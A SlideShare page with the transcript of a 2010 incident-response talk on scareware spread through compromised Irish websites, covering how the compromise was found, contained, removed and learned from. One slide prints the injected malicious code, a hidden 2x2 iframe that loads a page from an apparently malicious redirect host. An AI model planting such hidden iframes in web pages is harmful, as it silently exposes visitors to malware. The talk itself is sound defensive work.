Your SlideShare is downloading. ×
Scareware Traversing the World via an Irish                        Web Exploit                               Mark Hillick ...
Presentations                           99%Friday 17 September 2010
IrelandFriday 17 September 2010
Ireland            CSIRT/CERT?Friday 17 September 2010
EuropeFriday 17 September 2010
Introducing IRISS                           Volunteer handlers                           Local Security                   ...
What do we see?Friday 17 September 2010
How do users feel?                           2/3 have been victims                           < 10% feel very safe         ...
Why we’re here!Friday 17 September 2010
ALERTS                           IRISS   customFriday 17 September 2010
ScarewareFriday 17 September 2010
$$$$             FBI -> $150 millionFriday 17 September 2010
How easy?          Very :-(Friday 17 September 2010
GrowthFriday 17 September 2010
Scareware EvolvingFriday 17 September 2010
Remember                      Zen and the art of incident handling ...Friday 17 September 2010
ReactionsFriday 17 September 2010
ReactionsFriday 17 September 2010
ReactionsFriday 17 September 2010
Identification          Gather information          Analysis          DetermineFriday 17 September 2010
Identification - Vector          Legitimate WebsitesFriday 17 September 2010
Identification - WA               Not visible               iframe injection                • <iframe frameborder = 0 heigh...
Identification - iframeFriday 17 September 2010
Identification - WA       DNS requests       HTTP         • Gets         • Posts       ScriptsFriday 17 September 2010
Identification - SWFriday 17 September 2010
Identification SWFriday 17 September 2010
Identification - SWFriday 17 September 2010
Identification - SWFriday 17 September 2010
Identification - Analysis                           Exploited Sites hosted on one server                           Weak FTP...
Containment          Verify          Stop the Spread            • Remove            • Notify            • Inform          ...
Eradication          Remove          Improve          Vulnerability Analysis          RestoreFriday 17 September 2010
Eradication - How?Friday 17 September 2010
Eradication - Hosting          Struggle but...Friday 17 September 2010
Recovery                           Source: Dilbert ©2009, United Feature Syndicate, Inc.Friday 17 September 2010
Recovery - Be Sure!             Validate, Restore & MonitorFriday 17 September 2010
Lessons LearnedFriday 17 September 2010
Lessons Learned                    Things required for an IR plan -                     • IR Team                     • Co...
Lessons Learned                Awareness                Back-up & test the restore ;-)                Patch               ...
Lessons Learned         “A website must be able to protect itself from a hostile         browser and a browser must be abl...
Lessons Learned - Prep          Fail to Prepare, well you know the rest :)Friday 17 September 2010
Scareware Evolution                                                  source: http://                                      ...
What do you use?Friday 17 September 2010
go raibh mile maith agat          Twitter                  @markofu                  @irisscert                  @hackeire...
Well......Friday 17 September 2010
Upcoming SlideShare
Loading in...5
×

Scareware Traversing the World via Ireland

670

Published on

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
670
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Scareware Traversing the World via Ireland"

  1. 1. Scareware Traversing the World via an Irish Web Exploit Mark Hillick (@markofu) IrissCert Incident HandlerFriday 17 September 2010
  2. 2. Presentations 99%Friday 17 September 2010
  3. 3. IrelandFriday 17 September 2010
  4. 4. Ireland CSIRT/CERT?Friday 17 September 2010
  5. 5. EuropeFriday 17 September 2010
  6. 6. Introducing IRISS Volunteer handlers Local Security Professionals Weekly handler shifts Not-for-profit organizationFriday 17 September 2010
  7. 7. What do we see?Friday 17 September 2010
  8. 8. How do users feel? 2/3 have been victims < 10% feel very safe 97% expect to be victims Law Enforcement & Businesses lack resourcesFriday 17 September 2010
  9. 9. Why we’re here!Friday 17 September 2010
  10. 10. ALERTS IRISS customFriday 17 September 2010
  11. 11. ScarewareFriday 17 September 2010
  12. 12. $$$$ FBI -> $150 millionFriday 17 September 2010
  13. 13. How easy? Very :-(Friday 17 September 2010
  14. 14. GrowthFriday 17 September 2010
  15. 15. Scareware EvolvingFriday 17 September 2010
  16. 16. Remember Zen and the art of incident handling ...Friday 17 September 2010
  17. 17. ReactionsFriday 17 September 2010
  18. 18. ReactionsFriday 17 September 2010
  19. 19. ReactionsFriday 17 September 2010
  20. 20. Identification Gather information Analysis DetermineFriday 17 September 2010
  21. 21. Identification - Vector Legitimate WebsitesFriday 17 September 2010
  22. 22. Identification - WA Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/ tds_a/go.php/go.php?id=4" /></body>Friday 17 September 2010
  23. 23. Identification - iframeFriday 17 September 2010
  24. 24. Identification - WA DNS requests HTTP • Gets • Posts ScriptsFriday 17 September 2010
  25. 25. Identification - SWFriday 17 September 2010
  26. 26. Identification SWFriday 17 September 2010
  27. 27. Identification - SWFriday 17 September 2010
  28. 28. Identification - SWFriday 17 September 2010
  29. 29. Identification - Analysis Exploited Sites hosted on one server Weak FTP passwords (e.g. Ghost61) Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL InjectionFriday 17 September 2010
  30. 30. Containment Verify Stop the Spread • Remove • Notify • Inform Blackhole Source: Profound Whatever - Flickr Creative CommonsFriday 17 September 2010
  31. 31. Eradication Remove Improve Vulnerability Analysis RestoreFriday 17 September 2010
  32. 32. Eradication - How?Friday 17 September 2010
  33. 33. Eradication - Hosting Struggle but...Friday 17 September 2010
  34. 34. Recovery Source: Dilbert ©2009, United Feature Syndicate, Inc.Friday 17 September 2010
  35. 35. Recovery - Be Sure! Validate, Restore & MonitorFriday 17 September 2010
  36. 36. Lessons LearnedFriday 17 September 2010
  37. 37. Lessons Learned Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation ProcessFriday 17 September 2010
  38. 38. Lessons Learned Awareness Back-up & test the restore ;-) Patch Test website for vulnerabilities & exploits Defence-in-depth Free Local & Online tools for safer browsing& analysisFriday 17 September 2010
  39. 39. Lessons Learned “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” Jeremiah Grossman (Feb. 2010)Friday 17 September 2010
  40. 40. Lessons Learned - Prep Fail to Prepare, well you know the rest :)Friday 17 September 2010
  41. 41. Scareware Evolution source: http:// www.f-secure.comFriday 17 September 2010
  42. 42. What do you use?Friday 17 September 2010
  43. 43. go raibh mile maith agat Twitter @markofu @irisscert @hackeire #irisscon Google-Fu “scareware site:sans.org” Unless states, source of images -> Flickr Creative Commons, iStockPhoto or my own!!Friday 17 September 2010
  44. 44. Well......Friday 17 September 2010

×